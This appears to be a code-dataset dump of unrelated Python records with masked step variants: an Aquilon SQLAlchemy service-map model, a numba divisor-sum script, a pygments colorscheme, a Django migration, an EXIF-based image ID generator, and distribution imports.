Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id 
!= null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 
'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-5": "# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-\n# ex: set expandtab softtabstop=4 shiftwidth=4:\n#\n# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Maps service instances to locations. See class.__doc__ \"\"\"\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\n\nfrom sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,\n UniqueConstraint, CheckConstraint)\nfrom sqlalchemy.orm import (relation, deferred, backref, defer, undefer,\n lazyload, contains_eager, object_session)\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\n\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,\n Building, City, Campus, Country, Continent, Hub,\n Organization, ServiceInstance, Network, Personality,\n PersonalityServiceListItem, HostEnvironment)\n\n_TN = 'service_map'\n\n# TODO: We could calculate this map by building a graph of Location subclasses\n# using Location.valid_parents as edges, and then doing a topological sort\n# NOTE: The actual values here are unimportant, what matters is their order\n_LOCATION_PRIORITY = {\n # Rack and Desk are at the same level\n Rack: 1000,\n Desk: 1000,\n Room: 1100,\n Bunker: 1200,\n Building: 1300,\n City: 1400,\n Campus: 1500,\n Country: 1600,\n Continent: 1700,\n Hub: 1800,\n Organization: 1900,\n}\n\n# NOTE: The actual value here is unimportant, what matters is the order wrt.\n# location-based priorities\n_NETWORK_PRIORITY = 100\n\n# NOTE: The actual values here are unimportant, only their order matters\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n\n __tablename__ = _TN\n\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n\n service_instance_id = Column(ForeignKey(ServiceInstance.id,\n ondelete='CASCADE'),\n nullable=False)\n\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n 
nullable=True, index=True)\n\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n\n service_instance = relation(ServiceInstance, innerjoin=True,\n backref=backref('service_map',\n cascade=\"all, delete-orphan\",\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n\n __table_args__ = (UniqueConstraint(service_instance_id,\n personality_id, host_environment_id,\n location_id, network_id,\n name='%s_uk' % _TN),\n # At most one of personality_id and host_environment_id\n # can be not NULL\n CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1,\n name='%s_target_ck' % _TN))\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError: # pragma: no cover\n raise InternalError(\"The service map is not prepared to handle \"\n \"location class %r\" % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return (self.object_priority, self.scope_priority)\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None, personality=None,\n host_environment=None):\n if network and location: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Network and a \"\n \"Location at the same time\")\n\n if network is None and location is None: # pragma: no cover\n raise AquilonError(\"A service should by mapped to a Network or a \"\n \"Location\")\n\n if personality and host_environment: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Personality and \"\n \"a HostEnvironment at the same time\")\n\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location,\n personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n # Simplified service map lookup - single service, location-based maps\n # only, no client bindings\n session = object_session(dbservice)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n lazyload('service_instance.service'))\n\n instances = []\n min_seen_priority = (maxsize,)\n\n # We want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n 
elif min_seen_priority == map.priority:\n instances.append(si)\n\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n\n session = object_session(dblocation)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n PSLI = PersonalityServiceListItem\n\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))\n\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n\n # Rules for filtering by target object\n q = q.filter(or_(\n and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()),\n ServiceMap.personality == dbstage.personality,\n ServiceMap.host_environment_id == coalesce(\n PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n\n # Rules for filtering by location/scope\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids),\n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n undefer('service_instance._client_count'),\n lazyload('service_instance.service'))\n\n instance_cache = {}\n instance_priority = defaultdict(lambda: (maxsize,))\n\n # For every service, we want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n service = si.service\n\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n\n return instance_cache\n", "step-ids": [ 9, 10, 11, 13, 14 ] }
[ 9, 10, 11, 13, 14 ]
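In the ServiceMap record above, candidate maps are ranked by the priority property, a tuple of (object_priority, scope_priority) in which the lowest tuple wins. A small stand-alone sketch of that comparison using the module's own constants (the two tuples below are stand-ins built by hand, not real ServiceMap rows; the Rack value comes from _LOCATION_PRIORITY):

# Lower priority tuples win, and the object priority is compared first.
TARGET_PERSONALITY, TARGET_GLOBAL = 10, 1000   # object priorities
NETWORK_PRIORITY, RACK_PRIORITY = 100, 1000    # scope priorities

# a personality-targeted map scoped to a Rack ...
personality_rack = (TARGET_PERSONALITY, RACK_PRIORITY)   # (10, 1000)
# ... beats a global map scoped to a Network
global_network = (TARGET_GLOBAL, NETWORK_PRIORITY)       # (1000, 100)

assert personality_rack < global_network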
from numba import jit @jit def resolve(): N = int(input()) ans = 0 for n in range(1, N+1): for m in range(n, N+1, n): ans += m print(ans) if __name__ == "__main__": resolve()
normal
{ "blob_id": "8d8df517ca5486e62cc1b5ac23bbcfa65ed9c1ff", "index": 6611, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\nif __name__ == '__main__':\n resolve()\n", "step-4": "from numba import jit\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\nif __name__ == '__main__':\n resolve()\n", "step-5": "from numba import jit\n\n@jit\ndef resolve():\n N = int(input())\n\n ans = 0\n for n in range(1, N+1):\n for m in range(n, N+1, n):\n ans += m\n print(ans)\n\nif __name__ == \"__main__\":\n resolve()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
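The resolve() function in the record above sums, for every n up to N, all multiples of n that do not exceed N; the numba jit decorator only compiles that same double loop. A plain-Python check of what it computes for a small N:

# Same double loop as resolve(), without numba or input().
# For N = 4: n=1 gives 1+2+3+4, n=2 gives 2+4, n=3 gives 3, n=4 gives 4,
# so the total is 10 + 6 + 3 + 4 = 23.
def multiples_sum(N):
    return sum(m for n in range(1, N + 1) for m in range(n, N + 1, n))

assert multiples_sum(4) == 23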
# -*- coding: utf-8 -*- """ Neverland2 Colorscheme ~~~~~~~~~~~~~~~~~~~~~~ Converted by Vim Colorscheme Converter """ from pygments.style import Style from pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String class Neverland2Style(Style): background_color = '#121212' styles = { Token: '#ffffff', Name.Function: '#ff005f', Operator.Word: '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading: '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute: '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff', Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff', String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception: '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading: '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808', Generic.Emph: '#808080 underline', }
normal
{ "blob_id": "9dccc19abb6dac9e9606dc1fd83a227b4da9bf1f", "index": 4047, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Neverland2Style(Style):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Neverland2Style(Style):\n background_color = '#121212'\n styles = {Token: '#ffffff', Name.Function: '#ff005f', Operator.Word:\n '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading:\n '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.\n Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute:\n '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.\n Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception:\n '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading:\n '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.\n Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline'}\n", "step-4": "<mask token>\nfrom pygments.style import Style\nfrom pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String\n\n\nclass Neverland2Style(Style):\n background_color = '#121212'\n styles = {Token: '#ffffff', Name.Function: '#ff005f', Operator.Word:\n '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading:\n '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.\n Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute:\n '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.\n Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception:\n '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading:\n '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.\n Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline'}\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n Neverland2 Colorscheme\n ~~~~~~~~~~~~~~~~~~~~~~\n\n Converted by Vim Colorscheme Converter\n\"\"\"\nfrom pygments.style import Style\nfrom pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String\n\nclass Neverland2Style(Style):\n\n background_color = '#121212'\n styles = {\n Token: '#ffffff',\n Name.Function: '#ff005f',\n Operator.Word: '#00ff00',\n Name.Label: 'noinherit #ffffaf',\n Generic.Subheading: '#0000ff',\n Generic.Traceback: '#ff00af bg:#121212 bold',\n Generic.Error: '#ffafff bg:#121212',\n Comment: '#87875f',\n Name.Attribute: '#ff005f',\n Name.Constant: '#af5fff bold',\n Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212',\n Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f',\n Generic.Deleted: '#d70087 bg:#080808',\n Comment.Preproc: '#ffafd7',\n Keyword: '#ffff87 bold',\n Name.Exception: '#87ff00 bold',\n Name.Variable: '#d75f00',\n Generic.Heading: '#0000ff',\n Name.Tag: '#ffff87 bold',\n Number: '#0087ff',\n Generic.Output: '#121212 bg:#121212',\n Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline',\n }\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
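The Neverland2 record above only defines a pygments Style subclass; such a class is normally handed straight to a formatter. The sketch below assumes the class is importable from a local module named neverland2 (that module name is an assumption); the rest is the standard pygments API.

# Render a small piece of Python source as HTML with the colorscheme above.
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter

from neverland2 import Neverland2Style  # assumed local module

html = highlight('print("hello")', PythonLexer(),
                 HtmlFormatter(style=Neverland2Style, full=True))
print(html[:60])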
# Generated by Django 2.0 on 2018-03-06 16:21 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('digressions', '0004_auto_20180303_1158'), ] operations = [ migrations.RemoveField( model_name='extraits', name='extraits_livre_id', ), migrations.AddField( model_name='extraits', name='extraits_livre_id', field=models.ForeignKey(default='du coté de chez Swann', on_delete=django.db.models.deletion.CASCADE, to='digressions.Livre'), preserve_default=False, ), ]
normal
{ "blob_id": "38c21fb959d8b98b616006ea48bd720cc6f9995c", "index": 1462, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('digressions', '0004_auto_20180303_1158')]\n operations = [migrations.RemoveField(model_name='extraits', name=\n 'extraits_livre_id'), migrations.AddField(model_name='extraits',\n name='extraits_livre_id', field=models.ForeignKey(default=\n 'du coté de chez Swann', on_delete=django.db.models.deletion.\n CASCADE, to='digressions.Livre'), preserve_default=False)]\n", "step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('digressions', '0004_auto_20180303_1158')]\n operations = [migrations.RemoveField(model_name='extraits', name=\n 'extraits_livre_id'), migrations.AddField(model_name='extraits',\n name='extraits_livre_id', field=models.ForeignKey(default=\n 'du coté de chez Swann', on_delete=django.db.models.deletion.\n CASCADE, to='digressions.Livre'), preserve_default=False)]\n", "step-5": "# Generated by Django 2.0 on 2018-03-06 16:21\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('digressions', '0004_auto_20180303_1158'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='extraits',\n name='extraits_livre_id',\n ),\n migrations.AddField(\n model_name='extraits',\n name='extraits_livre_id',\n field=models.ForeignKey(default='du coté de chez Swann', on_delete=django.db.models.deletion.CASCADE, to='digressions.Livre'),\n preserve_default=False,\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#======================================================================= __version__ = '''0.0.01''' __sub_version__ = '''20130714221105''' __copyright__ = '''(c) Alex A. Naanou 2011''' #----------------------------------------------------------------------- import os import sha import md5 import base64 import time import pyexiv2 as metadata #----------------------------------------------------------------------- # XXX need a strategy to check if two files that have the same GID are # identical, and if so, need to destinguish them in the GID... # might be a good idea to add a file hash # XXX not yet sure if this is unique enough to avoid conflicts if one # photographer has enough cameras... # XXX also might be wise to add a photographer ID into here... ##!!! add gid info section to identify the options used to greate a gid, e.g. EXIF date vs. ctime, etc. ##!!! do a general revision and remove leacy... def image_gid(path, date=None, format='%(artist)s-%(date)s-%(name)s', date_format='%Y%m%d-%H%M%S', default_artist='Unknown', use_ctime=False, hash_func=lambda s: sha.sha(s).hexdigest()): ''' Calculate image GID. Main gid criteria: - unique - calculable from the item (preferably any sub-item) - human-readable Default format: <artist>-<datetime>-<filename> Example: Alex_A.Naanou-20110627-195706-DSC_1234 If hash_func is not None, then the function will be used to generate a hex hash from the above string. Supported fields: %(artist)s - Exif.Image.Artist field, stripped and spaces replaced with underscores. If no artist info is set this will be set to default_artist. %(date)s - Exif.Photo.DateTimeOriginal formated to date_format argument. %(name)s - file name. NOTE: date and time are the date and time the image was made ('Exif.Image.DateTime') NOTE: need EXIF data to generate a GID ''' # get the filename... data = { 'name': os.path.splitext(os.path.split(path)[-1])[0], } ##!!! this might fail... i = metadata.ImageMetadata('%s' % path) try: i.read() except IOError: # can't read exif... i = None # check if we need a date in the id... if '%(date)s' in format: if date is not None: data['date'] = time.strftime(date_format, time.gmtime(date)) elif use_ctime or i is None: date = os.path.getctime(path) data['date'] = time.strftime(date_format, time.gmtime(date)) else: date = i['Exif.Photo.DateTimeOriginal'].value data['date'] = date.strftime(date_format) # check if we need an artist... if '%(artist)s' in format: data['artist'] = default_artist if i is not None: try: # set the artist if in EXIF... a = i['Exif.Image.Artist'].value.strip().replace(' ', '_') if a != '': data['artist'] = a except KeyError: pass if hash_func is not None: return hash_func(format % data) return format % data #--------------------------------------------------handle_commandline--- def handle_commandline(): from optparse import OptionParser parser = OptionParser() ##!!! 
need to define the path so that it shoes up in -h parser.add_option('-t', '--text', dest='format', action='store_const', const='text', default='sha', help='output GUID in base64 format.') parser.add_option('-b', '--base64', dest='format', action='store_const', const='base64', default='sha', help='output GUID in text format.') parser.add_option('-s', '--sha', dest='format', action='store_const', const='sha', default='sha', help='output GUID in sha format.') options, args = parser.parse_args() if len(args) != 1: parser.print_usage() else: IN_PATH = args[0] IN_PATH = IN_PATH.replace('\\', '/') if options.format == 'text': print image_gid(IN_PATH, hash_func=None) elif options.format == 'base64': # also remove the trailing \n... print image_gid(IN_PATH, hash_func=lambda s: base64.encodestring(s).strip()) else: print image_gid(IN_PATH) #----------------------------------------------------------------------- if __name__ == '__main__': handle_commandline() #======================================================================= # vim:set ts=4 sw=4 nowrap :
normal
{ "blob_id": "d03f87b7dfa8fe2c63500effda1bea5e41f17ffc", "index": 3787, "step-1": "#=======================================================================\r\n\r\n__version__ = '''0.0.01'''\r\n__sub_version__ = '''20130714221105'''\r\n__copyright__ = '''(c) Alex A. Naanou 2011'''\r\n\r\n\r\n#-----------------------------------------------------------------------\r\n\r\nimport os\r\nimport sha\r\nimport md5\r\nimport base64\r\nimport time\r\n\r\nimport pyexiv2 as metadata\r\n\r\n\r\n#-----------------------------------------------------------------------\r\n\r\n# XXX need a strategy to check if two files that have the same GID are\r\n# \t identical, and if so, need to destinguish them in the GID...\r\n# \t might be a good idea to add a file hash\r\n# XXX not yet sure if this is unique enough to avoid conflicts if one\r\n# \t photographer has enough cameras...\r\n# XXX also might be wise to add a photographer ID into here...\r\n##!!! add gid info section to identify the options used to greate a gid, e.g. EXIF date vs. ctime, etc.\r\n##!!! do a general revision and remove leacy...\r\ndef image_gid(path, date=None, \r\n\t\tformat='%(artist)s-%(date)s-%(name)s', \r\n\t\tdate_format='%Y%m%d-%H%M%S', \r\n\t\tdefault_artist='Unknown',\r\n\t\tuse_ctime=False,\r\n\t\thash_func=lambda s: sha.sha(s).hexdigest()):\r\n\t'''\r\n\tCalculate image GID.\r\n\r\n\tMain gid criteria:\r\n\t \t- unique\r\n\t \t- calculable from the item (preferably any sub-item)\r\n\t \t- human-readable\r\n\r\n\tDefault format:\r\n\t\t<artist>-<datetime>-<filename>\r\n\r\n\tExample:\r\n\t\tAlex_A.Naanou-20110627-195706-DSC_1234\t\r\n\r\n\tIf hash_func is not None, then the function will be used to generate \r\n\ta hex hash from the above string.\r\n\r\n\tSupported fields:\r\n\t\t%(artist)s\t- Exif.Image.Artist field, stripped and spaces replaced\r\n\t\t\t\t\t with underscores.\r\n\t\t\t\t\t If no artist info is set this will be set to default_artist.\r\n\t\t%(date)s\t- Exif.Photo.DateTimeOriginal formated to date_format argument.\r\n\t\t%(name)s\t- file name.\r\n\r\n\tNOTE: date and time are the date and time the image was made ('Exif.Image.DateTime')\r\n\tNOTE: need EXIF data to generate a GID\r\n\t'''\r\n\t# get the filename...\r\n\tdata = {\r\n\t\t'name': os.path.splitext(os.path.split(path)[-1])[0],\r\n\t}\r\n\t##!!! 
this might fail...\r\n\ti = metadata.ImageMetadata('%s' % path)\r\n\ttry:\r\n\t\ti.read()\r\n\texcept IOError:\r\n\t\t# can't read exif...\r\n\t\ti = None\r\n\t# check if we need a date in the id...\r\n\tif '%(date)s' in format:\r\n\t\tif date is not None:\r\n\t\t\tdata['date'] = time.strftime(date_format, time.gmtime(date))\r\n\t\telif use_ctime or i is None:\r\n\t\t\tdate = os.path.getctime(path)\r\n\t\t\tdata['date'] = time.strftime(date_format, time.gmtime(date))\r\n\t\telse:\r\n\t\t\tdate = i['Exif.Photo.DateTimeOriginal'].value\r\n\t\t\tdata['date'] = date.strftime(date_format)\r\n\t# check if we need an artist...\r\n\tif '%(artist)s' in format:\r\n\t\tdata['artist'] = default_artist\r\n\t\tif i is not None:\r\n\t\t\ttry:\r\n\t\t\t\t# set the artist if in EXIF...\r\n\t\t\t\ta = i['Exif.Image.Artist'].value.strip().replace(' ', '_')\r\n\t\t\t\tif a != '':\r\n\t\t\t\t\tdata['artist'] = a\r\n\t\t\texcept KeyError:\r\n\t\t\t\tpass\r\n\t\r\n\tif hash_func is not None:\r\n\t\treturn hash_func(format % data)\r\n\treturn format % data\r\n\r\n\r\n\r\n#--------------------------------------------------handle_commandline---\r\ndef handle_commandline():\r\n\tfrom optparse import OptionParser\r\n\r\n\tparser = OptionParser()\r\n\r\n\t##!!! need to define the path so that it shoes up in -h\r\n\r\n\tparser.add_option('-t', '--text',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='text',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in base64 format.')\r\n\tparser.add_option('-b', '--base64',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='base64',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in text format.')\r\n\tparser.add_option('-s', '--sha',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='sha',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in sha format.')\r\n\r\n\toptions, args = parser.parse_args()\r\n\r\n\tif len(args) != 1:\r\n\t\tparser.print_usage()\r\n\telse:\r\n\t\tIN_PATH = args[0]\r\n\t\tIN_PATH = IN_PATH.replace('\\\\', '/')\r\n\r\n\t\tif options.format == 'text':\r\n\t\t\tprint image_gid(IN_PATH, hash_func=None)\r\n\t\telif options.format == 'base64':\r\n\t\t\t# also remove the trailing \\n...\r\n\t\t\tprint image_gid(IN_PATH, hash_func=lambda s: base64.encodestring(s).strip())\r\n\t\telse:\r\n\t\t\tprint image_gid(IN_PATH)\r\n\r\n\r\n#-----------------------------------------------------------------------\r\nif __name__ == '__main__':\r\n\thandle_commandline()\r\n\r\n\r\n\r\n#=======================================================================\r\n# vim:set ts=4 sw=4 nowrap :\r\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from distributions.zero_inflated_poisson import ZeroInflatedPoisson from distributions.negative_binomial import NegativeBinomial from distributions.zero_inflated_negative_binomial import ZeroInflatedNegativeBinomial from distributions.zero_inflated import ZeroInflated from distributions.categorized import Categorized from distributions.pareto import Pareto
normal
